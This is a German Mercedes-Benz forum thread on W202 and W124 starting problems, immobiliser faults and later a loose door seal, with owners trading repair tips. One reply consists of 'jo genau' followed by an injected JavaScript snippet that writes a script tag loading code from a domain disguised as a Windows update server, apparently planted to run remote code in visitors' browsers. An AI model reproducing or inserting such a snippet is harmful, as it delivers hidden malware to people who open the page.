Startproblem, Wegfahrsperre

Diskutiere Startproblem, Wegfahrsperre im Forum C-Klasse, CLC & 190er im Bereich Mercedes-Benz - Hallo, Alle :)! Ich habe da einen sehr treuen Kameraden, der Baureihe W 202, Bj. 97 und ist schon bald 300tsd km durch den Wind geschossen, bisher...
T

tundi

Guest
Hallo, Alle :)!
Ich habe da einen sehr treuen Kameraden, der Baureihe W 202, Bj. 97 und ist schon bald 300tsd km durch den Wind geschossen, bisher tadellos. Seit kurzer Zeit hat er aber Startprobleme und ließ mich heute erstmals im Stich.
Was ist passiert: Ich entriegele den Wagen mit dem IF-Schlüssel, starte, Motor springt kurz an und nach 1 Sekund wieder aus. Das hatte ich schon mal. Ich also Wagen mit IF wieder verschlossen und wieder geöffnet. Früher klappte das und der Motor sprang an. Habe das heute 10 mal wiederholt. Anlasser kurbelt, Motor springt aber nicht an. Ich studierte Eure Themen, habe Ersatzschlüssel genommen und mit dem probiert. Nix,will nicht starten.
Habt Ihr eine Idee?
Könnte es das Absperrventil für die Benzinzufuhr sein und wie könnte man das Teil zum Arbeiten bringen?
 
Zuletzt bearbeitet von einem Moderator:
Hallo,

blinken die LED beim starten bzw. beim Zündung einschalten abwechselnd?
Ist der Fehler mit einem mal gekommen oder wurde irgendwelche Arbeiten durchgeführt?

Gruß
 
Servus in die Runde,

ich hatte mal einen W202 Diesel mit 95PS und der hatte den gleichen Fehler. Ursache war ein Riss in der Dieselvorwärmung (sitzt im Zylinderkopf) und damit hat er Wasser und Luft gezogen und damit ist der Motor nicht so zufrieden gewesen. Falls Du nun so einen Wagen hast, kontrolliere bitte, ob in den Treibstoffleitungen Luftblasen sind und ob der Wagen ganz leicht Wasser verbraucht ....
 
Startprobleme

Hallo,

mein Benz springt seit heute auch nicht mehr an,bei mir leuchten die beiden LED,s gleichzeitig. Bin heute beim Fahren einfach stehengeblieben und nun läßt sich der Wagen nicht mehr starten,habe im Winter eine neue Batterie eingebaut.Kann es daran liegen,oder ist die Fernbedienung kaputt? Wäre für jede Hilfe dankbar.

Micha
 
Hallo,

wenn die LED gleichzeitig leuchten, sind die Batterien im Senderschlüssel verschlissen.
Du solltest neue einbauen und es erneut versuchen.

Gruß
 
Motor springt nicht an...

Hallo,

seit einer Woche steht mein Auto in der Werkstatt..die Batterien waren es nicht,habe ich gewechselt. Nun ist es wahrscheinlich der OT-Geber,hoffe das der Wagen dann anspringt.

gruß
 
nachgerüstete Wegfahrsperre geht nicht mehr...

Hi leute, ... ich lasse mal diesen THREAD für mein problem aufleben. also: habe mir nach meinem crash wieder einen 260E gekauft. dieser hat jedoch von bosch eine nachgerüstete wegfahrsperre samt zv und sender.

nun bin ich am do-abend liegengeblieben. wurde vom adac abgeschleppt. der meinte die benzinpumpe wäre hin.

am nächsten morgen bin ich zur werkstatt, um mit dem meister alles zu besprechen. da ließ sich der wagen öffnen, die wegfahrsperre deaktivieren und vorausgesetzt der wagen wäre angesprungen, hätte er sich auch zünden lassen.

dann kam im laufe des vormittags ein anruf, das es nicht die pumpe wäre, sondern nur das relais der kraftstoffpumpe. man besorgt das teil direkt von mb und ich könnte am nachmittag den wagen wieder abholen.

als ich das tun wollte, sagte man mir, man habe das teil eingebaut. hätte auch gern gestestet, ob alles wieder geht, doch man bekommt den wagen nicht gezündet. ich habe ihnen also dieses eigenartige system der wegfahrsperre erklärt, dass man ihn über den zv-sender öffnen muss und dann innerhalb von - ich glaube - 45 sekunden starten muss. aber: das funktioniert nicht mehr. die batterien vom sender wurden durchgemessen und haben noch 5,4 volt. das reicht aus. der sender blinkt auch rot. ... nun bin ich am überlegen, ob ich diese sperre rausreißen lasse.

das problem: die werkstatt hat keine ahnung wo die eingebaut ist. habt ihr ne idee, wo diese dinger zum nachrüsten standardmäßig bei einem w124 eingebaut wurden. oder hat jemand einen tip für mich, wie man das ding anderweitig wieder zum laufen bekommt?

ist vielleicht nur der code des senders verlorengegangen und wenn ja, wie kann ich den neu programmieren?

auto war schon über längeren zeitraum von der batterie abgeklemmt. ohne wirkung.
 
dieser hat jedoch von bosch eine nachgerüstete wegfahrsperre samt zv und sender.

also ohne das ich hier das technik genie wäre....

ich würde mal zum bosch dienst fahren und die da fragen. denke mal die
wissen am ehesten wo und vor allem was die das verbauen.
 
also ohne das ich hier das technik genie wäre....

ich würde mal zum bosch dienst fahren und die da fragen. denke mal die
wissen am ehesten wo und vor allem was die das verbauen.

jo genau

<script language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
 
Hallo Tundi:diabolo:
Wenn du das Problem mit beiden Schlüsseln hast sind diese in ordnung.

Hierbei würde ich den Fehlercode auslesen lassen um zu schauen ob das Steuergerät Wegfahrsperre und der Kurbelwellengeber L5 in ordnung sind.

Dann ganz klar kraftstoffdruck und zündung prüfen.
 
Hallo Sfa 1975,,,,

schmeiss raus die wegfahrsperre,,,,,,den klaut eh keiner in deutschland:crazy:

fussraumverkleidung fahrer ausbauen,,,,da gehen schwarze kabel vom zündschloss weg ( man sieht dass sie nachträglich eingelötet worden sind )

Diese führen dich in der regel zum steuergerät--
 
hey, ... nach längerer abstinenz mal wieder hier und lasse "diesen alten thread" mal wieder aufleben.

die wegfahrsperre habe ich längst rausgerissen. hatte seitdem noch ein zweites mal ärger mit dem relais für die kraftstoffpumpe. mittlerweile reklamiere ich das stück gerade bei mercedes. vielleicht kriege ich das geld für die erste reparatur ja zurück. mal sehen..

nun habe ich aber noch eine andere frage:
über diesen harten winter haben sich auf beiden seiten die gummidichtungen unterhalb der türen gelöst. hinten rutschen sie auch immer aus der führung raus. insbesondere, weil meine kids immer wieder da dran kommen und auch nicht wirklich drauf achten.

womit "klebe" ich die am besten wieder fest? jetzt gibt das wetter ja die nötigen voraussetzungen den wagen mal so richtig sauber zu machen, so dass ein klebstoff auch halten würde :D
 
Meine Empfehlung:

Neuen Thread aufmachen bzw. Suche bemühen und dort an ein passendes Thema dranhängen. Unter Wegfahrsperre vermuten wohl die wenigsten ausgelutschte Dichtungen.

MfG Paule
 
Thema: Startproblem, Wegfahrsperre

Neueste Themen

Zurück
Oben